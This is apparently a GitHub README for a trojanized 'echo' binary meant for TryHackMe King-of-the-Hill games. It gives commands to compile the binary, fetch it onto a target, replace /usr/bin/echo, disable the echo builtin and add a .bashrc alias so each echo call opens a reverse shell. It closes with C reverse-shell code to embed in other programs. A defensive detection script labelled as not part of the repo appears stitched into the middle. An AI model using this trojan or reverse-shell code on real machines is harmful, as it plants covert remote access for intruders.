hoodietramp/Custom-Echo-For-TryHackme-KOTH

Malicious Binary - echo for KoTH | TryHackMe

What does it do?

  1. This custom-echo gives you a reverse shell on a custom port, which you set as PORT in the C code.
  2. How it works: whenever somebody runs an echo command on the machine where you planted your custom-echo, it sends you a reverse shell! :shipit:
  3. This can be used in multiple ways, but in this case we are using reverse-shell C code embedded in the raw echo.c code, which you can obtain via GitHub. (Linux, open-source! Yay.)

How to use it?

  • First, let's clone the repo:

    git clone https://github.com/hoodietramp/custom-echo

  • Now let's cd into it:

    cd custom-echo

  • Now we have to compile it:

    gcc -o custom-echo custom-echo.c

    You can also add the static flag, so that the binary you compile on your machine is ready to use on almost all Linux machines:

    gcc -o custom-echo custom-echo.c --static

  • Give it executable permissions:

    chmod +x custom-echo

  • Now transfer it to the machine on which you want to use it:

    • Start a Python server on your machine:

      python3 -m http.server 80

    • Now, on the target machine:

      wget LOCAL-IP/custom-echo; chmod +x custom-echo

    • This is potentially machine-breaking, as we will be swapping the default echo on the machine for our malicious binary. DO NOT TRY THIS ON YOUR OWN MACHINE.

      mv `which echo` /tmp/.tmpecho; cp custom-echo /usr/bin/echo

    • But it still won't work, because echo is a shell builtin, which means the shell doesn't need any external binary to run it. To fix this, use the following commands:

      enable -n echo
      echo "alias echo='/usr/bin/echo'" >> ~/.bashrc

    • Now we're ready to get our reverse shell. Let's see it in action. <3
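
From the defender's side, the steps above leave traces: a disabled builtin or an alias pointing echo at a path, and the original binary parked as a hidden file in /tmp. The script below is an added example, not part of this repo; the BUILTINS watch list and the function names scan_rc, hidden_execs and verify_coreutils are assumptions, and the sample files are constructed.

```shell
#!/bin/sh
# Added defensive example (not from this repo): find the traces left by the
# builtin-disable, alias and binary-swap steps. BUILTINS is an assumed watch list.
BUILTINS="echo printf test pwd kill"

# scan_rc FILE: report non-comment lines in a shell startup file that disable
# a watched builtin or alias it to an absolute path.
scan_rc() {
    [ -r "$1" ] || return 0
    awk -v names="$BUILTINS" -v f="$1" '
        BEGIN { n = split(names, b, " ") }
        /^[ \t]*#/ { next }
        {
            line = " " $0 " "   # pad so a name at either end still has a delimiter
            for (i = 1; i <= n; i++) {
                off = "[; \t]enable[ \t]+-n[ \t]+" b[i] "[; \t]"
                ali = "[; \t]alias[ \t]+" b[i] "=[\047\"]?/"
                if (line ~ off) printf "%s:%d: builtin disabled: %s\n", f, NR, $0
                if (line ~ ali) printf "%s:%d: builtin aliased to a path: %s\n", f, NR, $0
            }
        }' "$1"
}

# hidden_execs DIR: list hidden, owner-executable regular files directly in DIR
# (the original binary was parked as a dotfile in /tmp).
hidden_execs() {
    find "$1" -maxdepth 1 -type f -name '.*' -perm -100 2>/dev/null
}

# verify_coreutils: ask the package manager whether installed coreutils files
# (echo among them) still match what the package database recorded.
verify_coreutils() {
    if command -v dpkg >/dev/null 2>&1; then dpkg --verify coreutils
    elif command -v rpm >/dev/null 2>&1; then rpm -V coreutils
    else printf 'no dpkg or rpm found\n' >&2; return 2
    fi
}

# Constructed sample: a startup file after the steps above, plus a benign alias.
demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' '# enable -n echo' "alias ll='ls -l'" 'enable -n echo' \
        "alias echo='/usr/bin/echo'" > "$d/bashrc"
    : > "$d/.tmpecho" && chmod 755 "$d/.tmpecho"
    scan_rc "$d/bashrc"
    hidden_execs "$d"
    rm -rf "$d"
}
demo
```

Point scan_rc at each user's ~/.bashrc and the system-wide startup files, and hidden_execs at /tmp; verify_coreutils only gives an answer on dpkg- or rpm-based systems.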


Testing custom-echo:

[Two screenshots of custom-echo being tested]


If you want to play around with this code yourself, you can take the snippet below, add it as a called function in any C code, and compile it using the same process that we used above. (CBA with adding proper includes; if you are in this section, then you likely know how to.)

#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

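int caller()
{
    struct sockaddr_in sa;
    int s;
    /* <ip> and <port> are placeholders for the listener's address and port */
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr("<ip>");
    sa.sin_port = htons(<port>);
    /* open a TCP socket and connect out to the listener */
    s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    /* point stdin, stdout and stderr at the socket */
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);
    /* replace the current process with an interactive bash */
    execl("/bin/bash","bash","-i",0,0);
    return 0;
}
/* Obviously, call caller() after some primary function of the code you are adding it to. */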

About

custom-echo for koth tryhackme, holmes is such a homie <3
